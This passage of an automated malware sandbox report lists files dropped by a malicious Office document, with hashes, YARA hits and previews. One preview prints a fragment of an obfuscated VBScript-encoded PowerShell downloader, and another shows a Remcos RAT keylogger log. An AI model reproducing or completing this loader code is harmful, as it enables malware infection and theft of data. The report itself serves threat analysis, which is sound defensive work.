            SHA-512:34A538CAB69BD50EBFDEDCE9C65DE801A5ABA10F1D57981F70A271BE8A5474E0D7148F3B0F6455CE02200A7DF2D27CEF3471BDAE5C11F6ECDAE8E473D5001203
            Malicious:false
            Preview:.. dim asneirada , desanuviar , tensor , limoeiro , alfol , Cama , alfol1.. desanuviar = " ".. tensor = "" & limoeiro & desanuviar & limoeiro & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & limoeiro & desanuviar & limoeiro & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & limoeiro & desanuviar & limoeiro & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & limoeiro & desanuviar & limoeiro & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & limoeiro & desanuviar & limoeiro & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & limoeiro & desanuviar & limoeiro & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & limoeiro & desa

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:ISO-8859 text, with very long lines (6956), with CRLF, CR, LF line terminators
            Category:dropped
            Size (bytes):35284
            Entropy (8bit):3.7937836945977628
            Encrypted:false
            SSDEEP:768:nkGIquUU/zwBePWi7KBm2J8V0pdnw7h+5ck:kGIqu7/zAA37Ko2Jy0pFGk
            MD5:D92D4F4A1D9DD4151B48DBA9C911BE5E
            SHA1:41391287E7442A0629BEBCEE4A09B5C751C3334A
            SHA-256:4BB44D988825A04032C6E4ED62A631698DDDEE523CB1EFE0AD6422492B939463
            SHA-512:5E422753E2DDAC52698BD07582404EFFD943ACABB9D48EF3F37D6EAD1EC6C1883329C597208B6E963DD172C3514A89CDF2CCBF395147646BEDCDF976F5EB4663
            Malicious:true
            Yara Hits:
            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:{\rt..........{\*\xmltagtype777384574 \[}.{\7597157310)2-^).?;`+9[&%>*%.3<?>'&-?><]?:9<?$%>+>&.*/?7?.@>_^_;^9~@*!:?8',).|;2$](%)4'5.#-%][..?%..?.$8`?04*-%?86)!5?*.&.9%%52?9?].'?)?(#[?8,,6_&.1-&3~?!^7.%'?_:@<.6.)#._#7_@;.*=/6!&<#).3**=;#.<`7..^/(**3140%'.%$.;/9/-`?'5^$<30&[?)&(~4.+*2)?>`<$>#)^(3??=?$>^%'&:?:[2|[<`?%?375#4?^85:0566--[:9*^-|<<,/9>,^;]!$'?]^#.3>,.0=81?5%?=?>#=(;++&4?1?]7>(,.^33.7*6[3])~4?['&@%?|$#:)^?='~@*.|?/*%0:9>&.@?#.!|._^3?>3.4.?[]7%~=*0?~?5|#|>2*:0~%[!?*%?*.?]8<9>*:.=%-*>,<_&/+&!.#?:+~''>??$,?|??0?*/@'..!8?+?^483[-:#.13]=.)?.#100=_<?6&*%@<5@^)%3@<?*%-]?).!3#%^|_8.[/);6+?.7*|?.$$|.2?(1^6-!%://](7`.8<<98.&.*(>*3+~^1.!%-2'/~38?9:?[&-3#].-33[9?&`.??(<?&(:-@@5,?06*<??`?^+7!3@?^%|.2=<=0@]<.!?320?-.!.?_[^=`[39*?&2`6(5$/^_=8*/:#0-@&<<?_+[[:.=[6]3(;>??.2?7*(8|=3&?01?$!>(>?/)*8?_&7?/_(;~.',>?<8*_(.+%!2_??9^|=5?@?9%(5;.~_'[?7$5%?:/^+[-?%,3|_.?!4)-8^~76$!+57%.[+:4..*_?/.(=`4>27]!.7+8(]8.5.%/%+159_=1.9,?2^1)@8.?|?[8)399~0)7:|]-[>?3!1%06@>*0_0-..>@?]&$$4?]7=%=[?[$|*|#>=0!.?|%%16)[

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lionsandtigerbeautifulpicture[1].bmp

            Download File
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):156322
            Entropy (8bit):3.2657606017650114
            Encrypted:false
            SSDEEP:1536:Eokd99CObC6iLcme9aJK6CUrQhfW0/5JZUlBcNBg0BAbUZlu9gISsRQ:LkdvaJK62/2czg0BAcv
            MD5:AF216517B1AC9254BCFF5C37E6E80752
            SHA1:A5BED501BC6EC2A6E555D96FF175910CADB10B81
            SHA-256:AA849B703BB5635313B8CABE1F08C6BB0F5BCE5FA9D75260DA988584DA7A7471
            SHA-512:3ACDBF49F9D7A6E466E309E49CA66B9EB911F47B686E9753AC4DC23EE8149D330F767E79A808844CE1E2462153A4580B60D2D280FB1B29DC1855EF61AD675F82
            Malicious:false
            Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

            Download File
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):963
            Entropy (8bit):5.0179389973066115
            Encrypted:false
            SSDEEP:12:tkluand6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluWdRNuKyGX85jvXhNlT3/7AcV9Wro
            MD5:6B1D67591EF4EACFA44DA4A6EA0650AA
            SHA1:E656CCCB39B6DF75860136F91CDB011FACAB4609
            SHA-256:6AEB14C82544F677D77650FE6144D5B3FDA8669B2C105DA3A3433B4E3EAE8AB1
            SHA-512:DC3D7E3819B11140A7CC11B637C6B74DBD92AFAD377CBE0A2775D6F7D4CB752E7EC888A82F619242887EBA173CFAEC2F2A1926487B05C7418AAA73DD11DF9C6A
            Malicious:false
            Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50562C8B.emf

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):27232148
            Entropy (8bit):1.7083266128970274
            Encrypted:false
            SSDEEP:1536:G555m5Mc/hu5KBriOUtHNfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlSsQ3+3Zvaq:baZu50yknG/qc+tsLm08lkwCCH/t+93
            MD5:F6C15080574731D3807AC694ED95FA7E
            SHA1:71AA2CF6369AAB3822615A599C383FA034155D5E
            SHA-256:0C78DDCD2FAE40ECAA62210277D58B02A93CB468DA155927F72FFCDB259DE783
            SHA-512:6A8AFBDEDBD0DEAC1BA22D14732416229EBFFE9B47669743F960AA80EF25F3BF350ACDBF494A019BB0317FAAD00787BE265917927B586262D4996BBC277CB175
            Malicious:false
            Preview:....l................................5.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\940091CF.emf

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):27232148
            Entropy (8bit):1.7083266128970274
            Encrypted:false
            SSDEEP:1536:G555m5Mc/hu5KBriOUtHNfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlSsQ3+3Zvaq:baZu50yknG/qc+tsLm08lkwCCH/t+93
            MD5:F6C15080574731D3807AC694ED95FA7E
            SHA1:71AA2CF6369AAB3822615A599C383FA034155D5E
            SHA-256:0C78DDCD2FAE40ECAA62210277D58B02A93CB468DA155927F72FFCDB259DE783
            SHA-512:6A8AFBDEDBD0DEAC1BA22D14732416229EBFFE9B47669743F960AA80EF25F3BF350ACDBF494A019BB0317FAAD00787BE265917927B586262D4996BBC277CB175
            Malicious:false
            Preview:....l................................5.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ISO-8859 text, with very long lines (6956), with CRLF, CR, LF line terminators
            Category:dropped
            Size (bytes):35284
            Entropy (8bit):3.7937836945977628
            Encrypted:false
            SSDEEP:768:nkGIquUU/zwBePWi7KBm2J8V0pdnw7h+5ck:kGIqu7/zAA37Ko2Jy0pFGk
            MD5:D92D4F4A1D9DD4151B48DBA9C911BE5E
            SHA1:41391287E7442A0629BEBCEE4A09B5C751C3334A
            SHA-256:4BB44D988825A04032C6E4ED62A631698DDDEE523CB1EFE0AD6422492B939463
            SHA-512:5E422753E2DDAC52698BD07582404EFFD943ACABB9D48EF3F37D6EAD1EC6C1883329C597208B6E963DD172C3514A89CDF2CCBF395147646BEDCDF976F5EB4663
            Malicious:true
            Yara Hits:
            • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:{\rt..........{\*\xmltagtype777384574 \[}.{\7597157310)2-^).?;`+9[&%>*%.3<?>'&-?><]?:9<?$%>+>&.*/?7?.@>_^_;^9~@*!:?8',).|;2$](%)4'5.#-%][..?%..?.$8`?04*-%?86)!5?*.&.9%%52?9?].'?)?(#[?8,,6_&.1-&3~?!^7.%'?_:@<.6.)#._#7_@;.*=/6!&<#).3**=;#.<`7..^/(**3140%'.%$.;/9/-`?'5^$<30&[?)&(~4.+*2)?>`<$>#)^(3??=?$>^%'&:?:[2|[<`?%?375#4?^85:0566--[:9*^-|<<,/9>,^;]!$'?]^#.3>,.0=81?5%?=?>#=(;++&4?1?]7>(,.^33.7*6[3])~4?['&@%?|$#:)^?='~@*.|?/*%0:9>&.@?#.!|._^3?>3.4.?[]7%~=*0?~?5|#|>2*:0~%[!?*%?*.?]8<9>*:.=%-*>,<_&/+&!.#?:+~''>??$,?|??0?*/@'..!8?+?^483[-:#.13]=.)?.#100=_<?6&*%@<5@^)%3@<?*%-]?).!3#%^|_8.[/);6+?.7*|?.$$|.2?(1^6-!%://](7`.8<<98.&.*(>*3+~^1.!%-2'/~38?9:?[&-3#].-33[9?&`.??(<?&(:-@@5,?06*<??`?^+7!3@?^%|.2=<=0@]<.!?320?-.!.?_[^=`[39*?&2`6(5$/^_=8*/:#0-@&<<?_+[[:.=[6]3(;>??.2?7*(8|=3&?01?$!>(>?/)*8?_&7?/_(;~.',>?<8*_(.+%!2_??9^|=5?@?9%(5;.~_'[?7$5%?:/^+[-?%,3|_.?!4)-8^~76$!+57%.[+:4..*_?/.(=`4>27]!.7+8(]8.5.%/%+159_=1.9,?2^1)@8.?|?[8)399~0)7:|]-[>?3!1%06@>*0_0-..>@?]&$$4?]7=%=[?[$|*|#>=0!.?|%%16)[

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3B2A510.emf

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):44876
            Entropy (8bit):3.1343257829385616
            Encrypted:false
            SSDEEP:384:Fw/3cpAHrBnorBL7JYquJ8iGKpFF9WYb7rKdh:K/3wgBo108iZqdh
            MD5:2A7D1A6C2C8A418E5A2EEB1F49755A7B
            SHA1:9A39AC711F6A0E144D51038050EE55740DCDBB25
            SHA-256:56096C09C9E8F8DF7AF09BC4A84E702810A7FDCBCBB5DCA7B35E9E3329DEA72A
            SHA-512:954BADF577364944BDCF8A8940B8C877DDF16B2063929CBBD3AEB569518FCF739BDB7CFFC463F5106F53D735616B02815D0F1899AC7C883D27134BAB0B2BCCD7
            Malicious:false
            Preview:....l...........;...............~@..xW.. EMF....L...1.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.........8.......@.......................8.......8.......@.......7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i....................................................................................... K.............P.......H.......P.......................H.......H.......P.......7......................@.N..............C.a.l.i.b.r.i...........

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):16384
            Entropy (8bit):2.654679493525268
            Encrypted:false
            SSDEEP:96:GpMPRFOX1Lw8fw98J5+S93y4VMPCFOv1Lj8fw98J5+S93y4:vPeX1LJfLy4qPzv1LmfLy4
            MD5:3A39BDF6274F8E254FB0848E9FDD5FFC
            SHA1:1B0D5C8E96F10AA5E4250F370D765EBCA3957029
            SHA-256:5BCF64509D6DE46A3611ACF4BB2781AC629D299BC9E692D449DEC4AADE5F209D
            SHA-512:979AD787309E57C0BA8890E57F0D2FB8FB21573A2EBD7ABB8C4BCBBB50FC85BA68B6D39A5221918FFAB2D557B079141B6C477D03EC0054DDD4AF55F76F0E2F88
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A547D21A-47F4-4566-9EA0-48AE4C38E9E8}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):15360
            Entropy (8bit):3.5533971854587154
            Encrypted:false
            SSDEEP:384:7ucpAKC4T7JFshohVrk4udP4ERzv8eqWoO8azOrLZ:awNC4xFs6wR/78eqWouzOfZ
            MD5:30FFF36135AF6C91C615594D33C43EE8
            SHA1:EF54AB17E722D78E6E94C51858E8CB7D068E6065
            SHA-256:5E43D7D245C7A8FA2651CC82BF1620F3EF2D9BF5C2CD7CC8FC6597527E13F3AE
            SHA-512:F1BC0EDB45520F4706D82ED10AF19F8D7642743CDEFB3118EB4C8403D5193C71FC0DD029572145E5AC0125F4329594F8184407B7722BA59E0C60E1A6F9B1A7C6
            Malicious:false
            Preview:................5.9.7.1.5.7.3.1.0.).2.-.^.)...?.;.`.+.9.[.&.%.>.*.%...3.<.?.>.'.&.-.?.>.<.].?.:.9.<.?.$.%.>.+.>.&...*./.?.7.?...@.>._.^._.;.^.9.~.@.*.!.:.?.8.'.,.)...|.;.2.$.].(.%.).4.'.5...#.-.%.].[.....?.%.....?...$.8.`.?.0.4.*.-.%.?.8.6.).!.5.?.*...&...9.%.%.5.2.?.9.?.]...'.?.).?.(.#.[.?.8.,.,.6._.&...1.-.&.3.~.?.!.^.7...%.'.?._.:.@.<...6...).#..._.#.7._.@.;...*.=./.6.!.&.<.#.)...3.*.*.=.;.#...<.`.7.....^./.(.*.*.3.1.4.0.%.'...%.$...;./.9./.-.`.?.'.5.^.$.<.3.0.&.[.?.).&.(.~.4...+.*.2.).?.>.`.<.$.>.#.).^.(.3.?.?.=.?.$.>.^.%.'.&.:.?.:.[.2.|.[.<.`.?.%.?.3.7.5.#.4.?.^.8.5.:.0.5.6.6.-.-.[.:.9.*.^.-.|.<.<.,./.9.>.,.^.;.].!.$.'.?.].^.#...3.>.,...0.=.8.1.?.5.%.?.=.?.>.#.=.(.;.+.+.&.4.?.1.?.].7.>.(.,...^.3.3...7.*.6.[.3.].).~.4.?.[.'.&.@.%.?.|.$.#.:.).^.?.=.'.~.@.*...|.?./.*.%.0.:.9.>.&...@.?.#...!.|..._.^.3.?.>.3...4...?.[.].7.%.~.=.*.0.?.~.?.5.|.#.|.>.2.*.:.0.~.%.[.!.?.*.%.?.*...?.].8.<.9.>.*.:...=.%.-.*.>.,.<._.&./.+.&.!...#.?.:.+.~.'.'.>.?.?.$.,.?.|.?.?.0.?.*./.@.'.....!.8.?.+.?.^.4.8.3.

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D529C5CE-8285-45BA-B66A-9D8DB1B4065B}.tmp

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\23fz5h35.tig.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\fpcwrtpf.zm0.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\i1h1e4pk.up3.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\mzbur00x.4zp.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\note\nots.dat

            Download File
            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            File Type:data
            Category:dropped
            Size (bytes):1018
            Entropy (8bit):3.5872003589764274
            Encrypted:false
            SSDEEP:24:6gcOMhJvHU1D8vHU1BTWqJJIWPJKvHU1Bu2WIt6Mcl:vcOoJvHU14vHU1BTWaIWRKvHU1Bu2WI2
            MD5:B002784E7EE64BCCE32DCEDB01AD1D48
            SHA1:47613AA7A3A3AA5E84300EC7BFC45C9695AA9A46
            SHA-256:261AA147E19AFF46E454AB0BA9D8D269CAE208A2A4B4AAA27435A1C238F93F84
            SHA-512:E034AFE7E8D6960BCED880CF1061C6AE5EB7FA84238CE8F04AFE0986AE2854A12E0C091C56EF3308FE0E911D1C802883CE8199B90D0CF30CA33161B25A08444C
            Malicious:true
            Yara Hits:
            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\note\nots.dat, Author: Joe Security
            Preview:....[.2.0.2.4./.0.5./.2.7. .0.3.:.0.0.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.n.L.N.G. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .R.e.f.1.9.9.2.0.8.3.0.2.8.1.9.8.2.9.3.8.R.T.].....[.W.i.n.].r.....[.R.u.n.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .R.e.f.1.9.9.2.0.8.3.0.2.8.1.9.8.2.9.3.8.R.T. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .R.e.f.1.9.9.2.0.8.3.0.2.8.1.9.8.2.9.3.8.R.T. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .1.4.3.4.6. .m.i.

            C:\Users\user\AppData\Local\Temp\vm3onvdv.zcw.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\ytgejtgm.ehe.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1

            C:\Users\user\AppData\Local\Temp\{2EA2BB7C-3DC4-4942-9968-E3B99D7EA63D}

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025611256926842164
            Encrypted:false
            SSDEEP:6:I3DPcbsXHvxggLR6h+g28ze23RXv//4tfnRujlw//+GtluJ/eRuj:I3DPZPuog28ze2RvYg3J/
            MD5:9F03544288A66AFC3D87720A475A2C3F
            SHA1:F958F8BD2FAD4FFE49CE4163C61AA5B5139B4491
            SHA-256:5ACE0656917DA8471C8597D881869E28006710BC45C2396A46187FD99300F62A
            SHA-512:C16239620175928CCBD6DD80AD99CE55D38411C5A66DB18417621C202AE3008832DE13347376C820B6C5BC821550D2B9FB6E5359BE6F83E49CB8863229D892D2
            Malicious:false
            Preview:......M.eFy...z..K;"uK.l.-. ..S,...X.F...Fa.q.............................m=@v.N..z..........6...J@..|.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\{DB6FE7D5-749B-4053-8C55-3569E64CB263}

            Download File
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02561327614152181
